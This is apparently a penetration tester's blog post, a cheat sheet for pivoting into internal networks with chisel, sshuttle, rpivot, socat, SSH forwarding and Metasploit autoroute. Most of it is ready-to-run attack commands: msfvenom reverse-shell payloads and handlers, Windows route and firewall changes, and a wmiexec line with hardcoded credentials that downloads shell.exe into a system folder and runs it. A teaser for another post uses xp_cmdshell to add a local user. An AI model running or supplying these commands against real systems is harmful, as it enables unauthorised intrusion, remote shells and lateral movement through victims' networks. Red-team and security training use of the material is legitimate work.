Skip to main content

Pivoting into an internal network behind firewall

By

 

 

Accessing a Victim network from Windows box which is pivoted to Kali 

#On Kali
sshuttle --listen 0.0.0.0 -r user@10.10.10.10 192.168.1.0/24
or
./chisel server --port 9001 -reverse  
#On Victim 
./chisel.exe client 10.10.10.1:9001 R:0.0.0.0:1080:socks  
.\chisel.exe client  10.10.10.1:9001 R:8080:127.0.0.1:8080 R:8888:127.0.0.1:8888 R:9090:127.0.0.1:9090

#On windows 
route print
#delete default route 
route delete 0.0.0.0

#add a new route to kali- setting kali ip as gateway; kali_ip=which is on the same subnet as the windows box 
route add 0.0.0.0 mask 0.0.0.0 KALI_IP

#Now you should be able to access all the sites which are accessible on kali from windows box. 


#If the above doesnt work 

#asuming Kali and windows are on Eht0
#add a firewall rule to allow Kali ip traffic 
netsh advfirewall firewall add rule name="Allow VPN Traffic" dir=in action=allow protocol=any remoteip=KALI_ETH0_IP

#on Kali - Allow tun0 traffic to forward on iptables 
sudo iptables -P FORWARD ACCEPT
sudo iptables -t nat -A POSTROUTING -o tun0 -j MASQUERADE


#add below two - if even issue persists
iptables -A FORWARD -i tun0 -o eth0 -j ACCEPT
iptables -A FORWARD -i eth0 -o tun0 -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT


Note: Lets say, you tunned the traffic from victim to kali and is accessible on 127.0.0.1 --> on windows; you can access it on Kali ETH0 IP address - http://192.168.10.10

#incase of any issues try this on windows 
route delete 127.0.0.1
route delete 127.0.0.0
route add 127.0.0.0 mask 255.0.0.0 KALI_IP
route add 127.0.0.1 mask 255.255.255.255 KALI_IP
 

#to revert the changes; 192.168.206.2
route delete 0.0.0.0
route add 0.0.0.0 mask 0.0.0.0 VMWare_Gateway

Get a Meterpreter on the Target and add a route to attacker machine 

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.14.14.3 LPORT=4444 -f elf -o rev

msfconsole
use exploit/multi/handler 
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 10.14.14.3
set LPORT 4444
run 
background
sessions -i  
use post/multi/manage/autoroute
set SUBNET 192.168.125.0 
set SESSION 4
run
use auxiliary/server/socks_proxy
set SRVPORT 1060
run
Getting a Meterpreter Session from an Internal Network to which you do not have direct CLI access but RCE is possible

┌──(Bhanu㉿HackingDream)-[~]
└─$ ./chisel server --port 9002 -reverse


user@victim:/tmp$ ./chisel client KALI_IP:9002 6666:127.0.0.1:6666

Create a Staged Payload using HackTheWorld or msfvenom, 
Go to Meterpreter Session 

background
use exploit/multi/handler 
set payload windows/meterpreter_reverse_tcp
set LHOST 0.0.0.0
set LPORT 6666
run

upload the reverse shell somewhere in the internal network and run it on the target machine using some other means.
Example:

proxychains wmiexec.py -debug -nooutput domain/username:'P@$$W0rd1'@192.168.111.111"powershell.exe Invoke-WebRequest -Uri 'http://192.111.110:8000/shell.exe' -OutFile 'C:\Windows\System32\spool\drivers\color\shell.exe'; cmd.exe /c C:\Windows\System32\spool\drivers\color\shell.exe"
Starting a Reverse Tunnel using Chisel 

┌──(Bhanu㉿HackingDream)-[~/
└─$ ./chisel server --reverse

on Victim:
chisel.exe client http://10.14.14.14:8080 R:0.0.0.0:1080:socks

#when the user is connected you should see the below connection on your kali machine 
server: session#1: tun: proxy#R:1080=>socks: Listening


use proxychains to connect to any ip/port accessible from the target machine locally on your kali box 
Using RPivot to connect to Internal network 

┌──(bhanu㉿kali)-[~/Downloads/Tools/Pivot /rpivot]
└─$ python2.7 server.py --server-port 9999 --server-ip 0.0.0.0 --proxy-ip 127.0.0.1 --proxy-port 1080
New connection from host 10.10.10.12, source port 4329


on Victim/Target:
python client.py --server-ip 10.10.10.10 --server-port 9999

#sudo nano /etc/proxychains.conf
socks4 127.0.0.1 1080

Access victim network using proxychains tool_name
Pivoting using SShuttle

shuttle --listen 0.0.0.0 -r username@10.10.10.10 192.168.2.0/24
Using Socat to Setup a relay to the target server 


#on the jumpbox from where the target server is accessible
.\socat.exe tcp-listen:1433,tcp-connect:TARGET_SERVER_IP:1433

 
#Setup a relay from the jumpbox to Kali, so that we can access the target from the attacker machine 
#Local SQL Client → Kali → Socat → Jumpbox → Socat → TARGET_SERVER

socat tcp-l:1433,fork tcp:JUMP_BOX:1433
Adding a Route to a different network which is accessible

#sudo ip route add CIDR dev Interface
sudo ip route add 10.10.0.0/24 dev tun2
Port Forwarding an Internal Network

ssh -i id_rsa bhanu@10.10.10.10 
ssh -L 80:192.168.1.5:80 -i id_rsa bhanu@10.10.10.10
Labels:

Comments

Post a Comment

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

By
1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds...
Post a Comment
Read more

Host and Application locally and access it over the internet via ngrock

By
 ngrock creates a tunnel from your local machine to ngrock server and host it on the internet via their HTTPS url  Resister an account on ngrock and login #Download the client curl -sSL https://ngrok-agent.s3.amazonaws.com/ngrok.asc \ | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null \ && echo "deb https://ngrok-agent.s3.amazonaws.com buster main" \ | sudo tee /etc/apt/sources.list.d/ngrok.list \ && sudo apt update \ && sudo apt install ngrok #add the authToken ngrok config add-authtoken 2p7Oc #start a python server on your application python -m http.server 3000 #start the server - use the same port as the python server (3000 in below example) ngrok http http://localhost:3000 --request-header-add "ngrok-skip-browser-warning: true" Setting up a Request Header - Login to the application --> Univeral Gateway --> Edges - Create an Edge --> Request Headers --> `ngrok-skip-browser-warning :12 - go back to overv...
Post a Comment
Read more

Cloud Pentest Cheatsheet - Azure

By
Azure Cloud offers a comprehensive ecosystem of tools and services. Among its core components are: Azure Active Directory (AAD) Azure Resource Manager (ARM) Office 365 (O365) Initial Access Try to get a user credential via OSINT/Social engineering or try to comprise a web application hosted on Azure VM. Enumerate the roles attached to the VM and try to escalate your privileges.  Entra ID Directory Role Entra ID directory roles are predefined roles that grant permissions to perform specific tasks within an Azure AD tenant. These roles are essential for managing administrative tasks in Entra ID. Types of Roles: Built-in Directory Roles Global Administrator Application Administrator User Administrator Custom Directory Roles Accessing APIs in Azure Entra ID - Access via Microsoft Graph API Endpoint {HTTP method} https://graph.microsoft.com/{version}/{resource}?{query-parameters} Azure Resource Manager API Endpoint (ARM-specific) {HTTP method} https://management.azure.com/{...
Post a Comment
Read more